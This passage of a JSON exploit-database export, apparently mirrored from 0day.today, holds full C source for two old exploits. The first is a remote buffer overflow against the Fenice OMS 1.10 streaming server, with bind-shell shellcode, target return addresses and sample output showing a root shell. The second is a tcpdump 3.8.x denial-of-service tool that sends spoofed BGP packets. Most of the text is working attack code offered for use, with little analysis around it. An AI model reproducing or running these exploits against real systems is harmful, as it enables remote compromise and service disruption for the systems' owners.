sleepppppppp...\\n\");\r\n\t\tsleep(1);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t}\r\n\tclose(sock);\r\n\r\n\tprintf(\"** xhost, check it up, now!\\n**\\n*/\\n\");\r\n\texit(0);\r\n}\r\n\r\n/* eoc */\r\n\r\n\r\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8911"}, {"lastseen": "2018-04-15T01:51:41", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2006-04-25T00:00:00", "published": "2006-04-25T00:00:00", "id": "1337DAY-ID-8700", "href": "https://0day.today/exploit/description/8700", "type": "zdt", "title": "Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit", "sourceData": "=================================================================\r\nFenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit\r\n=================================================================\r\n\r\n/*\r\n\tIHS Iran Homeland Security public source code\r\n\tFenice - Open Media Streaming Server remote BOF exploit\r\n\tauthor : c0d3r \"kaveh razavi\" [email\u00a0protected]\r\n\tpackage : fenice-1.10.tar.gz and prolly prior versions\r\n\tworkaround : update after patch release\r\n\tadvisory : http://www.securityfocus.com/bid/17678\r\n\tcompany address : http://streaming.polito.it/server\r\n\ttimeline :\r\n\t23 Apr 2006 : vulnerability reported by Luigi Auriemma\r\n\t25 Sep 2006 : IHS exploit released \r\n\texploit features :\r\n\t1) a global offset \r\n\t2) reliable metasploit shellcode \r\n\t3) autoconnect to shell\r\n\tbad chars : 0x00 0x05 encoder : PexAlphaNum \r\n\tcompiled with gcc under Linux : gcc fenice.c -o fenice \r\n\r\n **************************************************************\r\n\t \r\n\tExploitation Method : linux-gate.so.1\r\n\t \r\n\tthe refrence written by izik could be downloaded from milw0rm.\r\n\tafter some research I realized that the offset is very stable\r\n\taround 2.6 kernels compiled from source. the VA patch will\r\n\teasily get bypassed. if you want to exploit 2.4 kernels \r\n\tyou can jump directly to the shellcode , there isn't any\r\n\tstack randomization for sure in 2.4.* by default.\r\n\tthe offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag\r\n\t(slackware 10.2), also on 2.6.15.4 compiled with i386 flag \r\n\t(Fedora core 2) was same. on default installation of fc3 the\r\n\tlinux-gate.so.1 has null at the first , so think of another \r\n\tway to jump to the shellcode.\r\n\r\n **************************************************************\r\n\r\n\tgreeting to :\r\n\r\n\twww.ihsteam.com the team , LorD and NT \r\n\twww.ihsteam.net english version ,\r\n\twww.c0d3r.org my home :)\r\n\twww.underground.ir friends who are participating in the forums\r\n\twww.exploitdev.com Jamie and Ben , those times are now legend\r\n\twww.milw0rm.com str0ke , keep the good job going\r\n\r\n/*\r\n/*\r\n\r\n[c0d3r]$ gcc fenice.c -o fenice\r\n[c0d3r]$ ./fenice 127.0.0.1 554 0\r\n\r\n-------- fenice - Open Media Streaming Project remote BOF exploit\r\n-------- copyrighted by c0d3r of IHS 2006\r\n\r\n[+] Targeting slackware 10.2\r\n[+] Shellcode size : 329 bytes\r\n[+] Building overflow string\r\n[+] attacking host 127.0.0.1\r\n[+] packet size = 750 byte\r\n[+] connected\r\n[+] sending the overflow string\r\n[+] exploit sent successfully to 127.0.0.1\r\n[+] trying to get shell\r\n[+] connecting to 127.0.0.1 on port 4444\r\n[+] target exploited successfully\r\n[+] Dropping into shell\r\n\r\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)\r\nLinux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux\r\n\r\n\r\n*/\r\n\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define inc 0x41\r\n#define size 750\r\n\r\n\r\nvoid gotshell(int new_sock);\r\nvoid usage();\r\n\r\n// metasploit.com shellcode - badchars = 0x00 0x05\r\n// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum\r\n// I had a bit difficulty to execute my shellcode because some chars\r\n// badly interpreted by fenice , anyway viva metasploit !\r\n\r\nunsigned char shellcode[] =\r\n\r\n\"\\xeb\\x59\\x59\\x59\\x59\\xeb\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\xe8\\xa4\\xff\\xff\\xff\"\r\n\"\\x4f\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x30\\x42\\x36\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\"\r\n\"\\x32\\x42\\x44\\x42\\x48\\x34\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\"\r\n\"\\x51\\x42\\x30\\x41\\x44\\x41\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\"\r\n\"\\x41\\x43\\x4b\\x4d\\x43\\x45\\x43\\x54\\x43\\x45\\x4c\\x56\\x44\\x50\\x4c\\x36\"\r\n\"\\x48\\x36\\x4a\\x55\\x49\\x49\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x58\\x48\\x49\"\r\n\"\\x43\\x54\\x44\\x45\\x48\\x36\\x4a\\x46\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\"\r\n\"\\x49\\x38\\x41\\x4e\\x4c\\x46\\x48\\x46\\x4a\\x35\\x42\\x35\\x41\\x35\\x48\\x45\"\r\n\"\\x49\\x48\\x41\\x4e\\x4d\\x4c\\x42\\x48\\x42\\x4b\\x48\\x36\\x41\\x4d\\x43\\x4e\"\r\n\"\\x4d\\x4c\\x42\\x58\\x44\\x45\\x44\\x55\\x48\\x45\\x43\\x54\\x49\\x38\\x41\\x4e\"\r\n\"\\x42\\x4b\\x48\\x46\\x4d\\x4c\\x42\\x58\\x43\\x59\\x4c\\x56\\x44\\x30\\x49\\x55\"\r\n\"\\x42\\x4b\\x4f\\x33\\x4d\\x4c\\x42\\x48\\x49\\x34\\x49\\x37\\x49\\x4f\\x42\\x4b\"\r\n\"\\x4b\\x30\\x44\\x55\\x4a\\x46\\x4f\\x52\\x4f\\x32\\x43\\x47\\x4a\\x46\\x4a\\x56\"\r\n\"\\x4f\\x42\\x44\\x56\\x49\\x36\\x50\\x36\\x49\\x48\\x43\\x4e\\x44\\x55\\x43\\x55\"\r\n\"\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x48\\x5a\";\r\n\r\nchar slack [] = \"\\x77\\xe7\\xff\\xff\"; // slackware 10.2 2.6.15.6 \r\nchar FC2_2_6_15[] = \"\\x77\\xe7\\xff\\xff\";\t// Fedora core 2 , 2.6.15.4\r\nchar debug [] = \"\\xdd\\xdd\\xdd\\xdd\";\t// debugging purpose\r\nchar ret[4];\r\nchar get [] = \"\\x47\\x45\\x54\\x20\\x2f\";\r\nstruct hostent *hp;\r\nstruct sockaddr_in con;\r\nunsigned int rc,rc2,len=16,sock,sock2,os,addr,port;\r\nchar buffer[size];\r\n\r\n// gotshell is from jamie (darkdud3) remote exploit sample \r\n// with a bit change\r\n\r\nvoid gotshell(int sock){\r\n\r\n\tfd_set fd_read;\r\n\tchar buff[1024];\r\n\tchar cmd[100] = \"id;uname -a\\n\";\r\n\tint n;\r\n\r\n\tFD_ZERO(&fd_read);\r\n\tFD_SET(sock, &fd_read);\r\n\tFD_SET(0, &fd_read);\r\n\tsend(sock, cmd, strlen(cmd), 0);\r\n\twhile(1) {\r\n\t\tFD_SET(sock,&fd_read);\r\n\t\tFD_SET(0,&fd_read);\r\n\t\tif(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n\t\tif( FD_ISSET(sock, &fd_read) ) {\r\n\t\t\tif((n=recv(sock,buff,sizeof(buff),0))<0){\r\n\t\t\tfprintf(stderr, \"EOF\\n\");\r\n\t\t\texit(2);\r\n\t\t\t}\r\n\t\t\tif(write(1,buff,n)<0)break;\r\n\t\t}\r\n\t\tif ( FD_ISSET(0, &fd_read) ) {\r\n\t\t\tif((n=read(0,buff,sizeof(buff)))<0){\r\n\t\t\t\tfprintf(stderr,\"EOF\\n\");\r\n\t\t\t\texit(2);\r\n\t\t\t}\r\n\t\t\tif(send(sock,buff,n,0)<0) break;\r\n\t\t}\r\n\t\tusleep(10);\r\n\t}\r\n\tfprintf(stderr,\"Connection aborted, select failed()\\n\");\r\n\texit(0);\r\n}\r\n\r\nvoid usage(char *arg){\r\n\tprintf(\"-------- usage : %s host_or_ip port target\\n\",arg);\r\n\tprintf(\"-------- example : %s localhost 554 0\\n\",arg);\r\n\tprintf(\"-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\\n\");\r\n\tprintf(\"-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\\n\");\r\n\tprintf(\"-------- target 2 : debug\t\t\t : 2\\n\\n\");\r\n\texit(-1) ;\r\n}\r\n\r\nint main(int argc,char **argv){\r\n\r\n\tprintf(\"\\n-------- fenice - Open Media Streaming Project remote BOF exploit\\n\");\r\n\tprintf(\"-------- copyrighted by c0d3r of IHS 2006\\n\\n\");\r\n\tif(argc != 4)\r\n\t\tusage(argv[0]);\r\n\tos = (unsigned short)atoi(argv[3]);\r\n\tswitch(os){\r\n\t\tcase 0:\r\n\t\tstrcat(ret,slack);\r\n\t\tprintf(\"[+] Targeting slackware 10.2\\n\");\r\n\t\tbreak;\r\n\t\tcase 1:\r\n\t\tstrcat(ret,FC2_2_6_15);\r\n\t\tprintf(\"[+] Targeting fedora core 2 \\n\");\r\n\t\tbreak;\r\n\t\tcase 2:\r\n\t\tstrcat(ret,debug); \r\n\t\tprintf(\"[+] Debugging\\n\");\r\n\t\tbreak;\r\n\t\tdefault:\r\n\t\tprintf(\"\\n[-] This target doesnt exist in the list\\n\\n\");\r\n\r\n\texit(-1);\r\n\t}\r\n\tprintf(\"[+] Shellcode size : %d bytes\\n\",sizeof(shellcode)-1);\r\n\tprintf(\"[+] Building overflow string\\n\");\r\n\r\n\t// heart of exploit\r\n\r\n\tmemset(buffer,inc,size);\r\n\tmemcpy(buffer,get,5);\r\n\tmemcpy(buffer+5+361,ret,4);\r\n\tmemcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);\r\n\tbuffer[size] = 0;\r\n\r\n\t// EO heart of exploit\r\n\r\n\thp = gethostbyname(argv[1]);\r\n\tif (!hp)\r\n\t\taddr = inet_addr(argv[1]);\r\n\tif ((!hp) && (addr == INADDR_NONE) ){\r\n\t\tprintf(\"[-] unable to resolve %s\\n\",argv[1]);\r\n\t\texit(-1);\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n\tif (!sock){ \r\n\t\tprintf(\"[-] socket() error...\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\tif (hp != NULL)\r\n\t\tmemcpy(&(con.sin_addr),hp->h_addr,hp->h_length);\r\n\telse\r\n\t\tcon.sin_addr.s_addr = addr;\r\n\tif (hp)\r\n\t\tcon.sin_family = hp->h_addrtype;\r\n\telse\r\n\t\tcon.sin_family = AF_INET;\r\n\tport=atoi(argv[2]);\r\n\tcon.sin_port=htons(port);\r\n\tprintf(\"[+] attacking host %s\\n\" , argv[1]) ;\r\n\tsleep(1);\r\n\tprintf(\"[+] packet size = %d byte\\n\" , sizeof(buffer));\r\n\trc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));\r\n\tif(!rc){\r\n\t\tsleep(1) ;\r\n\t\tprintf(\"[+] connected\\n\") ;\r\n\t\tprintf(\"[+] sending the overflow string\\n\") ;\r\n\t\tsend(sock,buffer,strlen(buffer),0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsleep(1) ;\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsleep(1) ;\r\n\t\tprintf(\"[+] exploit sent successfully to %s \\n\" , argv[1]);\r\n\t\tprintf(\"[+] trying to get shell\\n\");\r\n\t\tprintf(\"[+] connecting to %s on port 4444\\n\",argv[1]);\r\n\t\tsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n\t\tif (!sock){ \r\n\t\t\tprintf(\"[-] socket() error...\\n\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tcon.sin_family = AF_INET;\r\n\t\tcon.sin_port=htons(4444);\r\n\t\trc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));\r\n\t\tif(rc2 != 0) {\r\n\t\tprintf(\"[-] exploit probably failed\\n\");\r\n\t\texit(-1);\r\n\t\t}\r\n\t\tif(!rc2){\r\n\t\t\tprintf(\"[+] target exploited successfully\\n\");\r\n\t\t\tprintf(\"[+] Dropping into shell\\n\\n\");\r\n\t\t\tgotshell(sock);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\n# 0day.today [2018-04-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8700"}, {"lastseen": "2018-02-06T07:17:35", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2005-04-24T00:00:00", "published": "2005-04-24T00:00:00", "id": "1337DAY-ID-5982", "href": "https://0day.today/exploit/description/5982", "type": "zdt", "title": "Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit", "sourceData": "=======================================================================\r\nTcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit\r\n=======================================================================\r\n\r\n\r\n\r\n/*[ tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS. ]***** \r\n * *\r\n * by: vade79/v9 [email\u00a0protected] (fakehalo/realhalo) *\r\n * *\r\n * compile: *\r\n * gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos *\r\n * gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos -D_USE_SYN *\r\n * *\r\n * tcpdump homepage/URL: *\r\n * http://www.tcpdump.org *\r\n * *\r\n * fix: *\r\n * this appears to have been fixed in the alpha 3.9.x / CVS *\r\n * versions. although i found no direct mention of the issue *\r\n * itself being resolved, the code has been changed in a way to *\r\n * not allow this to happen. *\r\n * *\r\n * Tcpdump is a program that allows you to dump the traffic on a *\r\n * network. It can be used to print out the headers of packets on *\r\n * a network interface that matches a given expression. You can *\r\n * use this tool to track down network problems, to detect \"ping *\r\n * attacks\" or to monitor the network activities. *\r\n * *\r\n * tcpdump(v3.8.3 and earlier versions) contains a remote denial *\r\n * of service vulnerability in the form of a single (BGP) packet *\r\n * causing an infinite loop. *\r\n * *\r\n * BGP is TCP, however the victim does not have to have the BGP *\r\n * port(179) open to abuse the bug. by sending a specially *\r\n * crafted (spoofed) TCP(ACK,PUSH) packet to port 179 you can *\r\n * trigger the infinite loop, however it depends on if the packet *\r\n * can make it out without being dropped. in some situations the *\r\n * source host/ip used must be within your local subnet(or your *\r\n * actual ip) for the (spoofed) packet to make it past your own *\r\n * router. if for some reason you think a (invalid) TCP(SYN) *\r\n * packet is more likely to make it out, compile with the *\r\n * -D_USE_SYN flag. (tcpdump will parse the BGP data even if it *\r\n * is a TCP(SYN) packet) *\r\n * *\r\n * some versions of tcpdump(depending on the platform/OS) need no *\r\n * special command-line arguments to allow this to happen. *\r\n * however most need the \"-v\" argument, and a some need the *\r\n * \"-s\" (snaplen) set to 88(non-spoofed is around 100, with the *\r\n * ip options) or more. *\r\n ******************************************************************/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#ifdef _USE_ARPA\r\n#include <arpa/inet.h>\r\n#endif\r\n\r\n/* doesn't seem to be standardized, so... */\r\n#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)\r\n#define BYTE_ORDER __BYTE_ORDER\r\n#endif\r\n#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)\r\n#define BIG_ENDIAN __BIG_ENDIAN\r\n#endif\r\n#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)\r\n#if BYTE_ORDER == BIG_ENDIAN\r\n#define _USE_BIG_ENDIAN\r\n#endif\r\n#endif\r\n\r\n/* will never need to be changed. */\r\n#define BGP_PORT 179\r\n#define DFL_AMOUNT 5\r\n#define TIMEOUT 10\r\n\r\n/* avoid platform-specific header madness. */\r\n/* (just plucked out of header files) */\r\nstruct iph{\r\n#ifdef _USE_BIG_ENDIAN\r\n unsigned char version:4,ihl:4;\r\n#else\r\n unsigned char ihl:4,version:4;\r\n#endif\r\n unsigned char tos;\r\n unsigned short tot_len;\r\n unsigned short id;\r\n unsigned short frag_off;\r\n unsigned char ttl;\r\n unsigned char protocol;\r\n unsigned short check;\r\n unsigned int saddr;\r\n unsigned int daddr;\r\n};\r\nstruct tcph{\r\n unsigned short source;\r\n unsigned short dest;\r\n unsigned int seq;\r\n unsigned int ack_seq;\r\n#ifdef _USE_BIG_ENDIAN\r\n unsigned short doff:4,res1:4,cwr:1,ece:1,\r\n urg:1,ack:1,psh:1,rst:1,syn:1,fin:1;\r\n#else\r\n unsigned short res1:4,doff:4,fin:1,syn:1,\r\n rst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;\r\n#endif\r\n unsigned short window;\r\n unsigned short check;\r\n unsigned short urg_ptr;\r\n};\r\nstruct sumh{\r\n unsigned int saddr;\r\n unsigned int daddr;\r\n unsigned char fill;\r\n unsigned char protocol;\r\n unsigned short len;\r\n};\r\n\r\n/* malformed BGP data. (the bug) */\r\nstatic char payload[]=\r\n /* shortened method. (34 bytes) */\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x13\\x02\\x00\"\r\n \"\\x01\\x00\\xff\\x00\\xff\\x0e\\x00\\xff\\x00\\x01\"\r\n \"\\x84\\x00\\x00\\x00\";\r\n /* original method, un-comment/swap if desired. (39 bytes) */\r\n /* \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" */\r\n /* \"\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x13\\x02\\x00\" */\r\n /* \"\\x01\\x00\\xff\\x00\\xff\\x0e\\x00\\xff\\x00\\x01\" */\r\n /* \"\\x84\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\"; */\r\n\r\n/* prototypes. (and sig_alarm) */\r\nvoid bgp_connect(unsigned int);\r\nvoid bgp_inject(unsigned int,unsigned int);\r\nunsigned short in_cksum(unsigned short *,signed int);\r\nunsigned int getip(char *);\r\nvoid printe(char *,signed char);\r\nvoid sig_alarm(){printe(\"alarm/timeout hit.\",1);}\r\n\r\n/* begin. */\r\nint main(int argc,char **argv) {\r\n unsigned char nospoof=0;\r\n unsigned int amt=DFL_AMOUNT;\r\n unsigned int daddr=0,saddr=0;\r\n printf(\"[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop \"\r\n \"DOS.\\n[*] by: vade79/v9 [email\u00a0protected] (fakehalo/realhalo)\\n\\n\");\r\n if(argc<2){\r\n printf(\"[*] syntax: %s <dst host> [src host(0=random)] [amount]\\n\",\r\n argv[0]);\r\n printf(\"[*] syntax: %s <dst host> nospoof\\n\",argv[0]);\r\n exit(1);\r\n }\r\n if(!(daddr=getip(argv[1])))\r\n printe(\"invalid destination host/ip.\",1);\r\n if(argc>2){\r\n if(strstr(argv[2],\"nospoof\"))nospoof=1;\r\n else saddr=getip(argv[2]);\r\n }\r\n if(argc>3)amt=atoi(argv[3]);\r\n if(nospoof){\r\n printf(\"[*] target: %s\\n\",argv[1]);\r\n bgp_connect(daddr);\r\n printf(\"[*] done.\\n\");\r\n }\r\n else{\r\n if(!amt)printe(\"no packets?\",1);\r\n printf(\"[*] destination\\t: %s\\n\",argv[1]);\r\n printf(\"[*] source\\t: %s\\n\",(saddr?argv[2]:\"<random>\"));\r\n printf(\"[*] amount\\t: %u\\n\\n\",amt);\r\n printf(\"[+] sending(packet = .): \");\r\n fflush(stdout);\r\n while(amt--){\r\n /* spice things up. */\r\n srandom(time(0)+amt);\r\n bgp_inject(daddr,saddr);\r\n printf(\".\");\r\n fflush(stdout);\r\n usleep(50000);\r\n }\r\n printf(\"\\n\\n[*] done.\\n\");\r\n }\r\n fflush(stdout);\r\n exit(0);\r\n}\r\n/* (non-spoofed) generic connection. (port 179 on the */\r\n/* victim has to be open for this to work) */\r\nvoid bgp_connect(unsigned int daddr){\r\n signed int sock;\r\n struct sockaddr_in s;\r\n sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n s.sin_family=AF_INET;\r\n s.sin_port=htons(BGP_PORT);\r\n s.sin_addr.s_addr=daddr;\r\n printf(\"[*] attempting to connect...\\n\");\r\n signal(SIGALRM,sig_alarm);\r\n alarm(TIMEOUT);\r\n if(connect(sock,(struct sockaddr *)&s,sizeof(s)))\r\n printe(\"(non-spoofed) BGP connection failed.\",1);\r\n alarm(0);\r\n printf(\"[*] successfully connected.\\n\");\r\n printf(\"[*] sending malformed BGP data. (%u bytes)\\n\",\r\n sizeof(payload)-1);\r\n usleep(500000);\r\n write(sock,payload,sizeof(payload));\r\n usleep(500000);\r\n printf(\"[*] closing connection.\\n\\n\");\r\n close(sock);\r\n return;\r\n}\r\n/* (spoofed) generates and sends an unestablished (BGP) */\r\n/* TCP(ACK,PUSH) or TCP(SYN) packet. */\r\nvoid bgp_inject(unsigned int daddr,unsigned int saddr){\r\n signed int sock=0,on=1;\r\n unsigned int psize=0;\r\n char *p,*s;\r\n struct sockaddr_in sa;\r\n struct iph ip;\r\n struct tcph tcp;\r\n struct sumh sum;\r\n /* create raw (TCP) socket. */\r\n if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0)\r\n printe(\"could not allocate raw socket.\",1);\r\n /* allow (on some systems) for the user-supplied ip header. */\r\n#ifdef IP_HDRINCL\r\n if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))\r\n printe(\"could not set IP_HDRINCL socket option.\",1);\r\n#endif\r\n sa.sin_family=AF_INET;\r\n sa.sin_port=htons(BGP_PORT);\r\n sa.sin_addr.s_addr=daddr;\r\n psize=(sizeof(struct iph)+sizeof(struct tcph)+sizeof(payload)-1);\r\n memset(&ip,0,sizeof(struct iph));\r\n memset(&tcp,0,sizeof(struct tcph));\r\n /* values not filled = 0, from the memset() above. */\r\n ip.ihl=5;\r\n ip.version=4;\r\n ip.tot_len=htons(psize);\r\n ip.id=(random()%65535);\r\n ip.saddr=(saddr?saddr:random()%0xffffffff);\r\n ip.daddr=daddr;\r\n ip.ttl=(64*(random()%2+1));\r\n ip.protocol=IPPROTO_TCP;\r\n ip.frag_off=64;\r\n tcp.seq=(random()%0xffffffff+1);\r\n tcp.source=htons(random()%60000+1025);\r\n tcp.dest=sa.sin_port;\r\n /* passing BGP data as ip options for the syn packet method */\r\n /* doesn't work as tcpdump doesnt process it as BGP data. */\r\n tcp.doff=5;\r\n#ifdef _USE_SYN\r\n tcp.syn=1;\r\n tcp.window=htons(65535);\r\n#else\r\n tcp.ack=1;\r\n tcp.psh=1;\r\n tcp.ack_seq=(random()%0xffffffff+1);\r\n tcp.window=htons(4096*(random()%2+1));\r\n#endif\r\n /* needed for (correct) checksums. */\r\n sum.saddr=ip.saddr;\r\n sum.daddr=ip.daddr;\r\n sum.fill=0;\r\n sum.protocol=ip.protocol;\r\n sum.len=htons(sizeof(struct tcph)+sizeof(payload)-1);\r\n /* make sum/calc buffer for the tcp checksum. (correct) */\r\n if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct tcph)\r\n +sizeof(payload)+1)))\r\n printe(\"malloc() failed.\",1);\r\n memset(s,0,(sizeof(struct sumh)+sizeof(struct tcph)\r\n +sizeof(payload)+1));\r\n memcpy(s,&sum,sizeof(struct sumh));\r\n memcpy(s+sizeof(struct sumh),&tcp,sizeof(struct tcph));\r\n memcpy(s+sizeof(struct sumh)+sizeof(struct tcph),\r\n payload,sizeof(payload)-1);\r\n tcp.check=in_cksum((unsigned short *)s,\r\n sizeof(struct sumh)+sizeof(struct tcph)+sizeof(payload)-1);\r\n free(s);\r\n /* make sum/calc buffer for the ip checksum. (correct) */\r\n if(!(s=(char *)malloc(sizeof(struct iph)+1)))\r\n printe(\"malloc() failed.\",1);\r\n memset(s,0,(sizeof(struct iph)+1));\r\n memcpy(s,&ip,sizeof(struct iph));\r\n ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));\r\n free(s);\r\n /* put the packet together. */\r\n if(!(p=(char *)malloc(psize+1)))\r\n printe(\"malloc() failed.\",1);\r\n memset(p,0,psize);\r\n memcpy(p,&ip,sizeof(struct iph));\r\n memcpy(p+sizeof(struct iph),&tcp,sizeof(struct tcph));\r\n memcpy(p+(sizeof(struct iph)+sizeof(struct tcph)),\r\n payload,sizeof(payload));\r\n /* send the malformed BGP packet. */\r\n if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,\r\n sizeof(struct sockaddr))<psize)\r\n printe(\"failed to send forged BGP packet.\",1);\r\n free(p);\r\n return;\r\n}\r\n/* standard method for creating TCP/IP checksums. */\r\nunsigned short in_cksum(unsigned short *addr,signed int len){\r\n unsigned short answer=0;\r\n register unsigned short *w=addr;\r\n register int nleft=len,sum=0;\r\n while(nleft>1){\r\n sum+=*w++;\r\n nleft-=2;\r\n }\r\n if(nleft==1){\r\n *(unsigned char *)(&answer)=*(unsigned char *)w;\r\n sum+=answer;\r\n }\r\n sum=(sum>>16)+(sum&0xffff);\r\n sum+=(sum>>16);\r\n answer=~sum;\r\n return(answer);\r\n}\r\n/* gets the ip from a host/ip/numeric. */\r\nunsigned int getip(char *host){\r\n struct hostent *t;\r\n unsigned int s=0;\r\n if((s=inet_addr(host))){\r\n if((t=gethostbyname(host)))\r\n memcpy((char *)&s,(char *)t->h_addr,sizeof(s));\r\n }\r\n if(s==-1)s=0;\r\n return(s);\r\n}\r\n/* all-purpose error/exit function. */\r\nvoid printe(char *err,signed char e){\r\n printf(\"[!] %s\\n\",err);\r\n if(e)exit(e);\r\n return;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5982"}]}